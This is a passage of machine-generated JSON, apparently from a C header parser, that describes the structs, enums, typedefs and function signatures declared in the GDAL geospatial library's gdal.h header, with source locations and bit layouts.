"/usr/include/gdal/gdal.h:173:3", "type": { "tag": "struct", "ns": 0, "name": "", "id": 86, "location": "/usr/include/gdal/gdal.h:147:9", "bit-size": 512, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "nVersion", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "eResampleAlg", "bit-offset": 32, "bit-size": 32, "bit-alignment": 32, "type": { "tag": "GDALRIOResampleAlg" } }, { "tag": "field", "name": "pfnProgress", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "GDALProgressFunc" } }, { "tag": "field", "name": "pProgressData", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "field", "name": "bFloatingPointWindowValidity", "bit-offset": 192, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "dfXOff", "bit-offset": 256, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfYOff", "bit-offset": 320, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfXSize", "bit-offset": 384, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfYSize", "bit-offset": 448, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "enum", "ns": 0, "name": "", "id": 87, "location": "/usr/include/gdal/gdal.h:190:9", "fields": [{ "tag": "field", "name": "GCI_Undefined", "value": 0 }, { "tag": "field", "name": "GCI_GrayIndex", "value": 1 }, { "tag": "field", "name": "GCI_PaletteIndex", "value": 2 }, { "tag": "field", "name": "GCI_RedBand", "value": 3 }, { "tag": "field", "name": "GCI_GreenBand", "value": 4 }, { "tag": "field", "name": "GCI_BlueBand", "value": 5 }, { "tag": "field", "name": "GCI_AlphaBand", "value": 6 }, { "tag": "field", "name": "GCI_HueBand", "value": 7 }, { "tag": "field", "name": "GCI_SaturationBand", "value": 8 }, { "tag": "field", "name": "GCI_LightnessBand", "value": 9 }, { "tag": "field", "name": "GCI_CyanBand", "value": 10 }, { "tag": "field", "name": "GCI_MagentaBand", "value": 11 }, { "tag": "field", "name": "GCI_YellowBand", "value": 12 }, { "tag": "field", "name": "GCI_BlackBand", "value": 13 }, { "tag": "field", "name": "GCI_YCbCr_YBand", "value": 14 }, { "tag": "field", "name": "GCI_YCbCr_CbBand", "value": 15 }, { "tag": "field", "name": "GCI_YCbCr_CrBand", "value": 16 }, { "tag": "field", "name": "GCI_Max", "value": 16 }] }, { "tag": "typedef", "ns": 0, "name": "GDALColorInterp", "location": "/usr/include/gdal/gdal.h:210:3", "type": { "tag": ":enum", "name": "", "id": 87 } }, { "tag": "function", "name": "GDALGetColorInterpretationName", "ns": 0, "location": "/usr/include/gdal/gdal.h:212:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALColorInterp" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALGetColorInterpretationByName", "ns": 0, "location": "/usr/include/gdal/gdal.h:213:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "GDALColorInterp" } }, { "tag": "enum", "ns": 0, "name": "", "id": 88, "location": "/usr/include/gdal/gdal.h:216:9", "fields": [{ "tag": "field", "name": "GPI_Gray", "value": 0 }, { "tag": "field", "name": "GPI_RGB", "value": 1 }, { "tag": "field", "name": "GPI_CMYK", "value": 2 }, { "tag": "field", "name": "GPI_HLS", "value": 3 }] }, { "tag": "typedef", "ns": 0, "name": "GDALPaletteInterp", "location": "/usr/include/gdal/gdal.h:222:3", "type": { "tag": ":enum", "name": "", "id": 88 } }, { "tag": "function", "name": "GDALGetPaletteInterpretationName", "ns": 0, "location": "/usr/include/gdal/gdal.h:224:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALPaletteInterp" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "typedef", "ns": 0, "name": "GDALMajorObjectH", "location": "/usr/include/gdal/gdal.h:252:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "GDALDatasetH", "location": "/usr/include/gdal/gdal.h:255:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "GDALRasterBandH", "location": "/usr/include/gdal/gdal.h:258:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "GDALDriverH", "location": "/usr/include/gdal/gdal.h:261:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "GDALColorTableH", "location": "/usr/include/gdal/gdal.h:264:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "GDALRasterAttributeTableH", "location": "/usr/include/gdal/gdal.h:267:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "GDALAsyncReaderH", "location": "/usr/include/gdal/gdal.h:270:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "GSpacing", "location": "/usr/include/gdal/gdal.h:273:17", "type": { "tag": "GIntBig" } }, { "tag": "function", "name": "GDALAllRegister", "ns": 0, "location": "/usr/include/gdal/gdal.h:394:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALCreate", "ns": 0, "location": "/usr/include/gdal/gdal.h:396:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDriver", "type": { "tag": "GDALDriverH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": "GDALDatasetH" } }, { "tag": "function", "name": "GDALCreateCopy", "ns": 0, "location": "/usr/include/gdal/gdal.h:400:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "CSLConstList" } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "GDALDatasetH" } }, { "tag": "function", "name": "GDALIdentifyDriver", "ns": 0, "location": "/usr/include/gdal/gdal.h:403:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "papszFileList", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": "GDALDriverH" } }, { "tag": "function", "name": "GDALIdentifyDriverEx", "ns": 0, "location": "/usr/include/gdal/gdal.h:406:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "nIdentifyFlags", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "papszAllowedDrivers", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "papszFileList", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "GDALDriverH" } }, { "tag": "function", "name": "GDALOpen", "ns": 0, "location": "/usr/include/gdal/gdal.h:411:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "eAccess", "type": { "tag": "GDALAccess" } }], "return-type": { "tag": "GDALDatasetH" } }, { "tag": "function", "name": "GDALOpenShared", "ns": 0, "location": "/usr/include/gdal/gdal.h:412:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALAccess" } }], "return-type": { "tag": "GDALDatasetH" } }, { "tag": "function", "name": "GDALOpenEx", "ns": 0, "location": "/usr/include/gdal/gdal.h:520:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "nOpenFlags", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "papszAllowedDrivers", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "papszOpenOptions", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "papszSiblingFiles", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "GDALDatasetH" } }, { "tag": "function", "name": "GDALDumpOpenDatasets", "ns": 0, "location": "/usr/include/gdal/gdal.h:526:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetDriverByName", "ns": 0, "location": "/usr/include/gdal/gdal.h:528:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "GDALDriverH" } }, { "tag": "function", "name": "GDALGetDriverCount", "ns": 0, "location": "/usr/include/gdal/gdal.h:529:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetDriver", "ns": 0, "location": "/usr/include/gdal/gdal.h:530:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GDALDriverH" } }, { "tag": "function", "name": "GDALCreateDriver", "ns": 0, "location": "/usr/include/gdal/gdal.h:531:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": "GDALDriverH" } }, { "tag": "function", "name": "GDALDestroyDriver", "ns": 0, "location": "/usr/include/gdal/gdal.h:532:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALRegisterDriver", "ns": 0, "location": "/usr/include/gdal/gdal.h:533:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALDeregisterDriver", "ns": 0, "location": "/usr/include/gdal/gdal.h:534:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALDestroyDriverManager", "ns": 0, "location": "/usr/include/gdal/gdal.h:535:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALDestroy", "ns": 0, "location": "/usr/include/gdal/gdal.h:537:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALDeleteDataset", "ns": 0, "location": "/usr/include/gdal/gdal.h:539:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRenameDataset", "ns": 0, "location": "/usr/include/gdal/gdal.h:540:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }, { "tag": "parameter", "name": "pszNewName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pszOldName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALCopyDatasetFiles", "ns": 0, "location": "/usr/include/gdal/gdal.h:543:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }, { "tag": "parameter", "name": "pszNewName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pszOldName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALValidateCreationOptions", "ns": 0, "location": "/usr/include/gdal/gdal.h:546:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }, { "tag": "parameter", "name": "papszCreationOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetDriverShortName", "ns": 0, "location": "/usr/include/gdal/gdal.h:550:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALGetDriverLongName", "ns": 0, "location": "/usr/include/gdal/gdal.h:551:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALGetDriverHelpTopic", "ns": 0, "location": "/usr/include/gdal/gdal.h:552:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALGetDriverCreationOptionList", "ns": 0, "location": "/usr/include/gdal/gdal.h:553:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDriverH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "typedef", "ns": 0, "name": "GDAL_GCP", "location": "/usr/include/gdal/gdal.h:581:3", "type": { "tag": "struct", "ns": 0, "name": "", "id": 89, "location": "/usr/include/gdal/gdal.h:560:9", "bit-size": 448, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "pszId", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "pszInfo", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "dfGCPPixel", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfGCPLine", "bit-offset": 192, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfGCPX", "bit-offset": 256, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfGCPY", "bit-offset": 320, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfGCPZ", "bit-offset": 384, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "function", "name": "GDALInitGCPs", "ns": 0, "location": "/usr/include/gdal/gdal.h:583:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "GDAL_GCP" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALDeinitGCPs", "ns": 0, "location": "/usr/include/gdal/gdal.h:584:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "GDAL_GCP" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALDuplicateGCPs", "ns": 0, "location": "/usr/include/gdal/gdal.h:585:32", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "GDAL_GCP" } } }], "return-type": { "tag": ":pointer", "type": { "tag": "GDAL_GCP" } } }, { "tag": "function", "name": "GDALGCPsToGeoTransform", "ns": 0, "location": "/usr/include/gdal/gdal.h:588:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nGCPCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pasGCPs", "type": { "tag": ":pointer", "type": { "tag": "GDAL_GCP" } } }, { "tag": "parameter", "name": "padfGeoTransform", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "bApproxOK", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALInvGeoTransform", "ns": 0, "location": "/usr/include/gdal/gdal.h:591:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "padfGeoTransformIn", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "padfInvGeoTransformOut", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALApplyGeoTransform", "ns": 0, "location": "/usr/include/gdal/gdal.h:593:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALComposeGeoTransforms", "ns": 0, "location": "/usr/include/gdal/gdal.h:595:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "padfGeoTransform1", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "padfGeoTransform2", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "padfGeoTransformOut", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALGetMetadataDomainList", "ns": 0, "location": "/usr/include/gdal/gdal.h:603:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hObject", "type": { "tag": "GDALMajorObjectH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "function", "name": "GDALGetMetadata", "ns": 0, "location": "/usr/include/gdal/gdal.h:604:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALMajorObjectH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "function", "name": "GDALSetMetadata", "ns": 0, "location": "/usr/include/gdal/gdal.h:605:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALMajorObjectH" } }, { "tag": "parameter", "name": "", "type": { "tag": "CSLConstList" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetMetadataItem", "ns": 0, "location": "/usr/include/gdal/gdal.h:608:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALMajorObjectH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALSetMetadataItem", "ns": 0, "location": "/usr/include/gdal/gdal.h:610:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALMajorObjectH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetDescription", "ns": 0, "location": "/usr/include/gdal/gdal.h:612:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALMajorObjectH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALSetDescription", "ns": 0, "location": "/usr/include/gdal/gdal.h:613:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALMajorObjectH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALGetDatasetDriver", "ns": 0, "location": "/usr/include/gdal/gdal.h:622:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": "GDALDriverH" } }, { "tag": "function", "name": "GDALGetFileList", "ns": 0, "location": "/usr/include/gdal/gdal.h:623:29", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "function", "name": "GDALClose", "ns": 0, "location": "/usr/include/gdal/gdal.h:624:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALGetRasterXSize", "ns": 0, "location": "/usr/include/gdal/gdal.h:625:29", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetRasterYSize", "ns": 0, "location": "/usr/include/gdal/gdal.h:626:29", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetRasterCount", "ns": 0, "location": "/usr/include/gdal/gdal.h:627:29", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetRasterBand", "ns": 0, "location": "/usr/include/gdal/gdal.h:628:37", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GDALRasterBandH" } }, { "tag": "function", "name": "GDALAddBand", "ns": 0, "location": "/usr/include/gdal/gdal.h:630:29", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "eType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALBeginAsyncReader", "ns": 0, "location": "/usr/include/gdal/gdal.h:634:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "nXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pBuf", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nBufXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBufYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eBufType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nBandCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "panBandMap", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "nPixelSpace", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nLineSpace", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 